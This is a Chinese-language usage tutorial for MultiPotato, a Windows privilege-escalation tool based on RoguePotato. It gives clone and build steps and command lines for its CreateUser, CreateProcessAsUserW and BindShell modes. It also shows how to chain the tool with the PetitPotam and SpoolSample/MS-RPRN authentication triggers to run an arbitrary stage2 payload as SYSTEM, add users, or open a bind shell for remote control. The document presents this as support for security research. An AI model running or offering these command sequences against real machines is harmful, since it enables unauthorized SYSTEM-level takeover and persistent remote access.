MultiPotato 使用教程

MultiPotato 使用教程

MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato

1. 项目介绍

MultiPotato 是一个用于权限提升的开源工具，由 @S3cur3Th1sSh1t 开发。它基于 @splinter_code 和 @decoder_it 的 RoguePotato 项目，但具有更高的灵活性。MultiPotato 不依赖特定的 SYSTEM 权限触发器，而是提供多种方法供用户选择，包括 CreateProcessWithTokenW、CreateProcessAsUserW、CreateUser 和 BindShell 等。

MultiPotato 的核心功能是开启一个命名管道服务器，并模拟任何连接到该服务器的用户进行操作。这使得它能应对不同的系统认证触发器，例如结合 PetitPotam 或 SpoolSample 等公开的系统权限触发器来工作。

2. 项目快速启动

2.1 环境准备

确保你已经安装了 Git 和 Visual Studio 或任何支持 C++ 编译的开发环境。

2.2 克隆项目

git clone https://github.com/S3cur3Th1sSh1t/MultiPotato.git
cd MultiPotato

2.3 编译项目

使用 Visual Studio 打开 MultiPotato.sln 文件，并进行编译。编译完成后，你将得到一个可执行文件 MultiPotato.exe。

2.4 运行示例

以下是一些常见的运行示例：

2.4.1 使用 CreateUser 技术

MultiPotato.exe -t CreateUser

2.4.2 使用 CreateProcessAsUserW 技术

MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

2.4.3 使用 BindShell 技术

MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

3. 应用案例和最佳实践

3.1 创建用户

你可以配合修改后的 PetitPotam 触发器使用 MultiPotato，如在 EFSRPC 漏洞利用中：

MultiPotato.exe -t CreateUser
PetitPotamModified.exe localhost/pipe/pwned localhost

3.2 进程创建

与 SpoolSample 一起使用，可通过 CreateProcessAsUserW 在目标系统上执行任意程序：

MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

3.3 远程命令执行

通过 BindShell 功能，MultiPotato 可以建立一个命令行交互式会话，允许远程控制：

MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

4. 典型生态项目

4.1 PetitPotam

PetitPotam 是一个公开的系统权限触发器，可以与 MultiPotato 结合使用，用于创建用户或执行其他操作。

4.2 SpoolSample

SpoolSample 是另一个常用的系统权限触发器，可以与 MultiPotato 结合使用，用于进程创建或远程命令执行。

4.3 MS-RPRN

MS-RPRN 是一个用于打印机服务的工具，可以与 MultiPotato 结合使用，用于触发 CreateProcessAsUserW 或 BindShell 技术。

通过这些生态项目的结合，MultiPotato 可以在不同的场景下实现系统级别的权限提升，为安全研究人员和开发者提供了强大的工具支持。

MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato